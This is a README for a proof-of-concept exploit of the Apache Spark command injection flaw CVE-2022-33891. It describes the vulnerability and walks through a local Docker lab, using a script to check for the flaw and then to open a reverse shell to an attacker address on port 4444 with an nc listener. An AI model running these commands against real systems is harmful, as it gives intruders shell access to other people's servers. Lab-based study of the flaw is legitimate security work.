Share
## https://sploitus.com/exploit?id=8F58638A-ED03-5EC8-A403-5D0B1725D83F
<h1 style="font-size:10vw" align="left">CVE-2022-33891 - Apache Spark Command Injection Vulnerability</h1>


<img src="https://img.shields.io/badge/CVSS:3.1%20Score%20-8.8 HIGH-red"> [![Python](https://img.shields.io/badge/Python-%E2%89%A5%203.11-blueviolet.svg)](https://www.python.org/) <img src="https://img.shields.io/badge/Maintained%3F-Yes-96c40f">


******
⚠️ *For educational and authorized security research purposes only*


## Original Exploit Authors
Very grateful to the original PoC author [AkbarTrilaksana](https://github.com/AkbarTrilaksana)


## Description
The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.


******
## Step Guides
1. First, clone the repository
    ```bash
    git clone https://github.com/asepsaepdin/CVE-2022-33891.git
    ```
    
2. Change directory
    ```bash
    cd CVE-2022-33891
    ```
    
3. Install the dependencies:
    ```bash
    pip3 install -r requirements.txt --break-system-packages
    ```

4. Let the container spin up
    ```bash
    docker compose up
    ```
    
5.  In a new terminal, run command
    ```bash
    docker exec -it CVE-2022-33891-spark-1 /bin/bash
    ```

6.  In the container bash session, enter:
    ```bash
    echo "spark.acls.enable       true" >> conf/spark-defaults.conf
    ```
    
7.  Optionally, cat the contents of spark-defaults.conf to make sure it looks good.

8.  Exit the interactice bash shell and Ctl-C your docker-compose process.

9.  Once the containers have powered down gracefully, rerun docker-compose up
    ```bash
    docker compose up
    ```
    
10. Check to see if the target is vulnerable:
    ```bash
    python3 poc.py -u http://localhost -p 8080 --check
    ```
    
11. From an attacker perspective, remote code execution is critical to get access to an interactive shell. So, executing the following command would trigger a telnet reverse shell over tcp based on bash to attacker’s system on port 4444/tcp:
    ```bash
    python3 poc.py -u http://localhost -p 8080 --revshell -lh 172.16.10.24 -lp 4444
    ```
    ```bash
    nc -nlvp 4444
    ```
    
 
******
## Credits
- https://github.com/AkbarTrilaksana/cve-2022-33891
- https://nvd.nist.gov/vuln/detail/cve-2022-33891